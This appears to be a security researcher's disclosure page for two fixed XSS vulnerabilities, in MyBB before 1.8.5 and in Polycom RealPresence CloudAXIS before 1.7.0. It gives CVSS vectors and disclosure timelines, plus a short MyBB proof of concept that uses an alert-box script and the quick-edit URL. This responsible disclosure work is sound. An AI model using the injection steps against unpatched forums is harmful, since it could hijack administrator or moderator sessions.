Adrian Hayter

Exploits

The following exploits were found by myself and responsibly disclosed to all relevant parties before their public disclosure here.

MyBB Cross-site Scripting (XSS) Vulnerability (CVE-2015-4552)


A persistent Cross-site Scripting (XSS) vulnerability exists in the /xmlhttp.php file in MyBB (aka MyBulletinBoard) versions before 1.8.5 which allows remote attackers (authenticated and in some cases unauthenticated) to inject arbitrary web script or HTML into their posts. Whilst the injected code is not rendered in posts themselves, if the post's quick edit AJAX URL is opened in a browser window, the injected code would be rendered. Since administrators / moderators can use the quick edit feature on any posts, this vulnerability could be used to target administrator / moderator accounts.

CVSS v2 Vector: (AV:N/AC:L/Au:N/C:N/I:P/A:N/E:F/RL:OF/RC:C)

Proof of Concept


Create a post with the content set to:
<script>alert(1)</script>
Get the ID of the post from the HTML (there are numerous locations where it is used) and use it in the following URL:
http://example.com/xmlhttp.php?action=edit_post&do=get_post&pid=ENTER_POST_ID_HERE
Open the URL in a browser window. The JavaScript should execute and create an alert box with the contents "1". This URL will work for the user who created the post, administrators, super moderators, and moderators with permissions to edit posts in the forum the post was made. All other users will see a permissions error.

Timeline


28th April 2015 - Vulnerability discovered and disclosed privately to MyBB team.
29th April 2015 - Vulnerability report accepted and bug confirmed by MyBB team.
27th May 2015 - Vulnerability fixed and released as part of MyBB 1.8.5.
15th June 2015 - Vulnerability disclosed publicly here.



Polycom RealPresence CloudAXIS Suite Cross-site Scripting (XSS) Vulnerability (CVE-2015-1516)


A persistent Cross-site Scripting (XSS) vulnerability exists in Polycom RealPresence CloudAXIS Suite versions prior to 1.7.0 which allows a remote authenticated user to inject arbitrary JavaScript or HTML into the application. Injected code is rendered and executed by a victim's web browser as soon as they join the session.

This vulnerability was found whilst working for CNS Hut3.

CVSS v2 Vector: (AV:N/AC:L/Au:S/C:N/I:P/A:N/E:POC/RL:OF/RC:C)

Timeline


16th September 2014 - Vulnerability discovered.
20th November 2014 - Vulnerability disclosed to Polycom Security Team.
12th December 2014 - Vulnerability report accepted and bug confirmed as fixed pending testing and verification.
April 2015 - Vulnerability fixed and released as part of 1.7.0 update.
18th June 2015 - Vulnerability disclosed publicly here.